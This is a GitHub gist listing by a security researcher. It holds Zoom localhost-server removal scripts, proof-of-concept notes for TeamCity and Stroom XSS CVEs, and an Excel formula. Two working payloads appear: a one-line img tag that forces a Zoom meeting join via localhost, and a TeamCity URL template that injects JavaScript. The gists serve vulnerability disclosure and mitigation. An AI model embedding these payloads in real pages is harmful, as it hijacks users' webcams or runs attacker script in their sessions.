Jonathan Leitschuh JLLeitschuh
@JLLeitschuh
JLLeitschuh / permanent_zoom_server_remover.sh
Created July 8, 2019 23:17
Permanently removes the Zoom localhost webserver and prevents it from being reinstalled in the future.
rm -rf ~/.zoomus
touch ~/.zoomus
# For just your local account
defaults write ~/Library/Preferences/us.zoom.config.plist ZDisableVideo 1
# For all users on the machine
sudo defaults write /Library/Preferences/us.zoom.config.plist ZDisableVideo 1
JLLeitschuh / CVE-2019-15848.md
Last active December 29, 2019 01:30
Full POC for CVE-2019-15848

CVE-2019-15848: TeamCity XSS to Remote Code Execution

This POC demonstrates taking advantage of an XSS vulnerability in TeamCity, allowing an attacker to achieve Remote Code Execution on a build agent if the victim has the ability to add steps to a CI job.

POC

The POC can be simplified to the following URL:

https://[domain.com]/project.html?projectId=[target_project_id]&tab=problems%27%7D)%3B%7D)()%3B[JS_PAYLOAD]
JLLeitschuh / CVE-2019-10779_GCHQ_Stroom_POC.md
Last active January 21, 2020 17:11
POC for CVE-2019-10779

GCHQ Stroom is vulnerable to Cross-Site Scripting due to the ability to load the Stroom dashboard on another site and insufficient protection against window event origins.

Versions

  • Affected versions: < 5.5.12 & < 6.0.25
  • Patched versions: 5.5.12 & 6.0.25

POC

Launch Stroom and assign it a hostname like stroom.my-company.com, then log in.

JLLeitschuh / DistanceDictionaryCalculation
Created March 16, 2017 00:04
A bit of code used in Excel to help my mom calculate the distance she drove for work and medical miles in a given year to help fill out her tax returns.
=IF(N3="",IF(ISNA(VLOOKUP(B3,'Distance Dictionary'!$A$3:$B$129,2, FALSE)),"",VLOOKUP(B3,'Distance Dictionary'!$A$3:$B$129,2, FALSE)),IF(OR(M3="Two Way", M3="two way"),"",N3))
JLLeitschuh / zoom_poc_simple.html
Last active April 3, 2020 18:50
Simplest example of the Zoom exploit
<img src="http://localhost:19421/launch?action=join&confno=492468757"/>
JLLeitschuh / How To Use GitHub Security Advisories.md
Last active July 14, 2020 16:55
An explanation of how to work with GitHub security advisories.

GitHub Security Advisories

If this is your first time using GitHub Security Advisories, please allow me to guide you through how they work.

Advisories are Private

As of September 17th, 2019, when advisories are published, the entire discussion within the advisory will not be made public. Any information you want to provide to the public should be included in the advisory body.

Updating an Advisory

JLLeitschuh / CVE-2019-19389-Ktor-CWE-113.md
Last active October 23, 2020 08:29
POC For: CVE-2019-19389
# To prevent the vulnerable server from running on your machine
# (this does not impact Zoom functionality), run these two lines in your Terminal.
pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;
# (You may need to run these lines for each user on your machine.)